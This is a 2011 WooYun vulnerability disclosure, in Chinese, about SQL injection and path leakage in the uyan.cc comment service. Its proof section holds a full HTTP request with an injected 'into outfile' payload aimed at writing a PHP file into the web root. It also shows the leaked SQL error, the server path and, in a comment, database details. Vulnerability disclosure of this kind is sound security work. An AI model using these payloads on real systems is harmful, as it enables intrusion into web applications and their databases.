当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03063

漏洞标题:友言(http://uyan.cc)存在注入与文件路径泄露问题

相关厂商:友言

漏洞作者: cr0_3

提交时间:2011-10-21 10:24

修复时间:2011-10-21 13:39

公开时间:2011-10-21 13:39

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-10-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-10-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

http://uyan.cc是新成立的社区评论创业公司,其对sql过滤不严导致漏洞发生。

详细说明:

http://uyan.cc/index.php/youyan_content/getRepliesTogether/time 对post上来的数据未进行过滤。同时http://uyan.cc/index.php/youyan?title=%E5%9B%BD%E5%86%852%E4%BA%BA%E5%88%9B%E4%B8%泄露了文件路径。
但由于数据库跟web分离,into outfile直接拿webshell难。

漏洞证明:

POST http://uyan.cc/index.php/youyan_content/getRepliesTogether/time HTTP/1.1
Host: uyan.cc
Connection: keep-alive
Content-Length: 723
Origin: http://uyan.cc
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Referer: http://uyan.cc/index.php/youyan?pageId=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&domain=www.36kr.coma'%20&&%20'1'='2&master_id=2711%20&&%201=2&title=''''''-1&url=-1&pageImg=;%3C/javascript%3E&pageContent=-1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=97ipt9bjm2otbd7j2cphg84444
comment_ids%5B%5D=168019&comment_ids%5B%5D=168031 and (select '11111' into outfile '//opt//lampstack-5.3.6-0//apache2//htdocs//controllers//1ssbbb.php' )=1&comment_ids%5B%5D=168020&comment_ids%5B%5D=168032&comment_ids%5B%5D=168007&comment_ids%5B%5D=168006&comment_ids%5B%5D=167967&comment_ids%5B%5D=167985&comment_ids%5B%5D=167986&comment_ids%5B%5D=167987&page=www.36kr.com_www.36kr.com%2F%3Fp%3D54654&delStyle=0&reply_page_no%5B167967%5D=0&reply_page_no%5B167985%5D=0&reply_page_no%5B167986%5D=0&reply_page_no%5B167987%5D=0&reply_page_no%5B168006%5D=0&reply_page_no%5B168007%5D=0&reply_page_no%5B168019%5D=0&reply_page_no%5B168020%5D=0&reply_page_no%5B168031%5D=0&reply_page_no%5B168032%5D=0&session_name=uyan_www.36kr.com


<body>
	<div id="content">
		<h1>A Database Error Occurred</h1>
		<p>Error Number: 1064</p><p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1=1 order by comment.time desc limit 0, 3' at line 3</p><p>select user.*, comment.* from comment
          LEFT JOIN user ON user.user_id = comment.user_id
          where comment.del=0 and comment.reply_to_comment_id=168031 and '1=1 order by comment.time desc limit 0, 3</p><p>Filename: /opt/lampstack-5.3.6-0/apache2/htdocs/models/comment_model.php</p><p>Line Number: 251</p>	</div>
</body>
</html>

修复方案:

对用户提交参数进行过滤,同时屏蔽错误详细信息

版权声明:转载请注明来源 cr0_3@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2011-10-21 15:34 | cr0_3 ( 路人 | Rank:8 漏洞数:3 | just do it.)

    不是db与数据库分离,应该是outfile 设置了目录权限。root@localhost5.1.56unknown-linux-gnuyouyan/opt/lampstack-5.3.6-0/mysql/data/

  2. 2011-10-21 18:22 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    不如等官方解释好了

  3. 2012-08-12 11:41 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    @cr0_3 挺好的